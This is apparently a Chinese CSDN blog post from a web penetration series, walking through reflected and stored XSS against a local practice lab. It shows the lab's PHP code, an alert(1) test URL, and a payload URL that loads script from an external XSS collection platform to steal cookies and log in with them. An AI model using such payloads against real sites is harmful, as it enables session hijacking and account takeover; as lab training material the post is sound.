web渗透【7】XSS跨站实例操作(2)

最新推荐文章于 2022-09-18 12:40:44 发布
最新推荐文章于 2022-09-18 12:40:44 发布
阅读量228 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/103802603
版权

1、(1)反射XSS网页源码:

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
setcookie("flag", "", time() - 1);
if (isset($_GET["id"])) {
    if (!empty($_GET["id"])) {
        if (strstr($_GET['id'], 'alert')){
            $sql = "SELECT * FROM env_list WHERE id = 9";
            $res = $dbConnect->query($sql);
            $row = mysqli_fetch_assoc($res);
            setcookie("flag", $row['envFlag']);
        }
    }
}
require_once TPMELATE."/xss_1.html";
?>

(2)XSS测试:

http://192.168.153.128/control/xss/xss_1.php?id=1%3Cscript%3Ealert%281%29%3C/script%3E

 (3)xss后台配置:(本人用的后台:https://xsshs.cn)

(4)利用XSS:

192.168.153.128/control/xss/xss_1.php?id=1<sCRiPt sRC=https://xsshs.cn/wPGg></sCrIpT> 

(5)、在后台可以获取cookie,直接利用cookie登陆:

(2)存储XSS:

提交后,会自动存在数据库,访问网页直接执行 

 

司徒荆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞——渗透day08
qq_62716256的博客
09-04 531
XSS漏洞——渗透day08
渗透测试实例指南--XSS
qq_37051023的博客
07-30 197
概要:XSS--脚本攻击,Cross-Site Scripting,属于代码注入攻击的一种,针对网应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入到网页,其他用户浏览器此页面时会受到影响,一旦攻击成功,则可能获取较高权限、私密网页内容、会话和cookie等内容。 XSS攻击分为三种方式:反射型XSS、存储型XSS、DOM型XSS。 反射型:攻击者利用电子邮件或其他方式将包含XSS代码的恶意链接发送给目标用户,目标用户点击或浏览此链接后,会访问到某服务器,服务器接收到请求后,将带有XSS代码的数
如何请求
qq_45475788的博客
12-09 1069
例子:a网有一个发布文章的页面,文章在网中任何人都可以看;一般用富文本编辑器时,都会直接禁止使用html,但是黑客可以在控制台,对富文本编辑器进行操作,比如写一个form表单提交,提交内容就是获取用户cookie,发送到b网后台(黑客自己的服务器);那么他在控制台直接进行ajax提交后,当有其他用户访问这个文章时,就用执行js,获取该用户的cookie,然后发送到自己服务器,此时他就会得到很多用户的cookie ...
脚本攻击实例解析
weixin_34061042的博客
12-12 124
作者:泉哥 主页:http://riusksk.blogbus.com 前言 攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS) 是指攻击者利用网程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对 访问者进行病毒侵害的一种攻击方式...
原创 xss脚本
20岁爱吃必胜客
02-17 139
其他写在下一篇
ThinkPHP2.x防范XSS攻击的方法
10-23
下面我们将深入探讨ThinkPHP2.x防范XSS攻击的方法,并提供实例分析。 首先,我们要理解XSS攻击的基本原理。攻击者通常通过构造特殊URL,将包含JavaScript代码的字符串注入到网页中,当用户访问这个被注入的URL...
xss脚本攻击-运维安全详细笔记
最新发布
06-30
xss脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss脚本攻击的知识点总结: 1.xss脚本攻击的定义 ...
XSS脚本攻击剖析与防御.pdf
05-16
第5章 XSS Worm,讲解了Web 2.0的最大威胁——脚本蠕虫,剖析了Web 2.0相关概念和其核心技术,这些知识对于理解和预防XSS Worm十分重要。第6章 Flash应用安全,就当前的Flash应用安全做出了深入阐述。第7章 深入...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
渗透校内网——XSS过程详解
6546546546456546
01-22 1399
——余弦函数( http://hi.baidu.com/ycosxhack )三更半夜原创我知道校内网曾经爆发的那个蠕虫,那时候爆发这个相对来说容易,因为那时XSS没任何挑战,而AJAX蠕虫不是谁都可以写出来的,至少要有不错的 JavaScript编程能力。我是这两天才开始认真使用校内网的,使用前就发文声称要XSS^^,没想到几个小时的渗透,发现了校内网的过滤系统就是形同虚设。下面详细讲解下这个渗
XSHM:XSHM漏洞利用示例
05-27
XSHM 点历史记录操纵(XSHM)利用示例。 详细信息在index.html页面中。 提供了两种测试方案:test1.html和test2.html 使用php,因此需要php服务器-重定向必须从后端进行,通过html或javascript触发重定向将不起作用。
Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试
foj5678的专栏
03-15 2708
Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试 2006-07-31 9:32 原始连接:http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/cisco/index.html SUMMARY First of all, I must tell that I'm really impr
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4079
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分2.8
能够发现90%以上XSS漏洞的7个主要的XSS案例。
weixin_42976700的博客
11-04 1746
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2924
XSS(cross-site script)脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2353
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
操纵浏览器的历史记录
weistar103的专栏
04-27 600
文章来自:https://developer.mozilla.org/zh-CN/docs/DOM/Manipulating_the_browser_history  window 对象通过history对象提供对览器历史记录的访问能力。它暴露了一些非常有用的方法和属性,让你在历史记录中自由前进和后退,而在HTML5中,更可以操纵历史记录中的数据。   历史记录概览  可以通过back...
Http的会话跟踪和攻击(xss
世上只有一种英雄主义
03-17 283
会话跟踪 什么是会话? 客户端打开与服务器的连接发出请求到服务器响应客户端请求的全过程称之为会话。 什么是会话跟踪? 会话跟踪指的是对同一个用户对服务器的连续的请求和接受响应的监视。 为什么需要会话跟踪? 浏览器与服务器之间的通信是通过HTTP协议进行通信的,而HTTP协议是”无状态”的协议,它不能保存客户的信息,即一次响应完成之后连接就断开了,下一次的请求需要重新连接,...
XSS攻击CVSS评分
05-26
XSS攻击的CVSS评分根据不同的情况可能有所不同,但通常情况下,它的评分都比较高,因为这种攻击可能会造成严重的安全问题。 根据CVSS 3.0标准,XSS攻击的评分取决于攻击的复杂性、攻击的范围、攻击的影响等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值